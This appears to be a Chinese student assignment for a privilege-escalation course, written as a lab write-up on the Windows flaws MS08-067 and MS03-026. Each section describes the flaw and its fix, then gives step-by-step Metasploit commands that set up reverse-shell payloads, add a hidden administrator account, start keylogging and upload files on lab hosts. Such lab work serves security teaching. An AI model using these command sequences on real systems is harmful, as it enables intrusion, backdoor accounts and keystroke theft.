《系統提權》作業
課程名稱:《系統提權》 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【要求】
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
二、測試工具
三、被測設備信息情況 1.基本信息
2.端口開放情況
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞名稱】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08_067 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞描述】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08-067漏洞將會影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。 發佈日期:2008/10/22 下載大小:因操作系統而異 說明:微軟安全公告KB958644 漏洞影響:服務器服務中的漏洞可能允許遠程執行代碼 發佈日期:2008/10/22 下載大小:因操作系統而異。 受影響的操作系統: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 此安全更新解決了服務器服務中一個祕密報告的漏洞。 如果用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。 防火牆最佳做法和標準的默認防火牆配置有助於保護網絡資源免受從企業外部發起的攻擊。可以通過安裝本 Microsoft 更新程序來保護計算機不受侵害。安裝後,可能必須重新啓動計算機。 嚴重等級:Windows 2000;XP;Server 2003爲嚴重,Windows Vista;Server 2008;7 Beta爲重要
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【解決措施】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08-067漏洞的終端用戶解決方案 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞驗證】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
指令:mafconsole
指令:search ms08_067 3使用ma08_067_netapi 指令:use exploit/windows/smb/ms08_067_netapi
4.查看攻擊載荷 指令:Show payloads
5. 設置windows/meterpreter/reverse_tcp載荷 指令: set payload windows/meterpreter/reverse_tcp
6.查看需要配置的參數 指令: show options
7.設置參數 Lhost爲攻擊方ip,rhost爲被攻擊方ip,target爲目標主機名稱 指令: set lhost 10.10.10.130 set rhost 10.10.10.131 set target 3
8.發動攻擊 指令:exploit
9.進入shell創建用戶 指令:shell net user hgc 123 /add
10.設置爲超級用戶 指令: net localgroup administrators hgc /add
11.對目標主機屏幕截取
指令: keysscan_start keyscan_dump keyscan_stop
13.創建文件 指令:mkdir hgc
|
【漏洞名稱】 |
MS03_026 |
【漏洞描述】 |
1、Remote Procedure Call (RPC)是Windows 操作系統使用的一種遠程過程調用協議,RPC提供進程間交互通信機制,允許在某臺計算機上運行程序的無縫地在遠程系統上執行代碼。協議本身源自開放軟件基 金會的RPC協議,Microsoft在其基礎上增加了自己的一些擴展。
eEye的研究人員發現,由於Windows RPC DCOM接口對報文的長度域缺乏檢查導致發生基於堆的溢出,遠程***者可以利用這些漏洞以本地系統權限在系統上執行任意指令。
漏洞實質上影響的是使用RPC的DCOM接口,此接口處理由客戶端機器發送給服務器的DCOM對象激活請求(如UNC路徑)。***者通過向目標發送畸形 RPC DCOM請求來利用這些漏洞。成功利用此漏洞可以以本地系統權限執行任意指令。***者可以在系統上執行任意操作 ,如安裝程序、查看或更改、刪除數據或創建系統管理員權限的帳戶。
使用者可以通過 135(UDP/TCP)、137/UDP、138/UDP、139/TCP、445(UDP/TCP)、593/TCP端口進行攻擊。對於啓動了COM Internet服務和RPC over HTTP的用戶來說,還可能通過80/TCP和443/TCP端口進行***。 2、Microsoft DCOM RPC相關係統漏洞,具體內容即爲MS03-026和MS03-039.正因爲此,造成Blaster.Worm(衝擊波).以及 w32.Nachi.Worm(衝擊波殺手)蠕蟲病毒在校園網絡中的泛濫.而且DCOM RPC漏洞的remote root ,可以讓一個不具備任何基礎知識的攻擊者,在2分鐘之內進入到你的計算機系統中,他所做的僅僅是從網上下載一個簡單的攻擊工具和一個掃描工具就可以了. 查找ms03-026系統漏洞的利用: msf>search ms03_026 顯示找到的ms03-026的路徑 msf>use exploit/windows/.../ms03_026_dcom
進入後可以輸入 msf exploit(ms03_026_dcom) > show options 來查看所需要輸入的參數
msf exploit(ms03_026_dcom) > show payloads 顯示當前模塊的所有攻擊載荷。攻擊載荷是我們希望在目標系統被滲透後去執行的代碼。 msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp 選擇一個反彈式的shell
msf exploit(ms03_026_dcom) > set RHOST 192.168.250.157 msf exploit(ms03_026_dcom) > set LHOST 192.168.250.135 輸入靶機地址和攻擊機的地址
msf exploit(ms03_026_dcom) > exploit 開始進行滲透攻擊 |
【解決措施】 |
解決方法:首先,打開“管理工具”→“服務”管理器,在服務管理器的主窗口服務列表中,找到名稱爲“Cryptographic Services”的服務項,雙擊該服務項,在彈出的該服務項屬性對話框中,單擊“停止”按鈕,停止該服務。然後,在資源管理器中,打開系統安裝目錄\\System32\\文件夾,在該文件夾下,找到名爲“catroot2”的文件夾,將其刪除或重命名。最後在服務管理器中,將“Cryptographic Services”服務啓動,並安裝系統漏洞補丁,一般就可以正常安裝系統補丁了 |
【漏洞驗證】 |
指令:msfconsole
指令search MS03_026
3.執行該文件 指令: use exploit/windows/dcerpc/ms03_026_dcom
4.查看攻擊載荷 指令:show payload 5.設置攻擊載荷 指令: set payload windows/meterpreter/reverse_tcp
6.查看需要設置的參數 指令: show options 7.設置參數 Lhost爲攻擊方ip,rhost爲被攻擊方ip,target爲目標主機名稱 指令: set lhost 10.10.10.130 set rhost 10.10.10.131 set target 0
8.開始運行
指令: net user hgc2 123 /add
指令: net localgroup administrators hgc2 /add
11.遠程桌面登錄
成功連接遠程主機
新建文件夾
返回虛擬機查看 可以看到文件夾成功出現,這表明系統管理員賬戶創建成功,遠程主機連接成功
12.上傳文件 指令:upload /root/user.txt 返回windows 2003查看
|
教程下載地址:https://download.csdn.net/download/qq_38162763/10594297
本次教程結束